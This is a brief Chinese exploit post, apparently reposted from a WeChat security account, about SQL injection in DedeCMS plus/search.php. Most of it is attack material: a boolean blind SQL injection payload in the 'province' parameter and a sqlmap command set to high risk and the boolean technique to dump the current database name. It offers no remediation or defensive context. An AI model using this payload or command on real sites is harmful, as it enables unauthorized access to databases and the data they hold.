plus/search.php?msg=&msgid=&province=msg=&msgid=&province=-9701' OR 6347=6347 AND 'CkEl'='CkEl
属于一个盲注
sql注入命令:
sqlmap -u "" -p province --risk 3 --technique B --current-db
本文始发于微信公众号(零组攻防实验室):dedecms plus/search.php sql injection
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论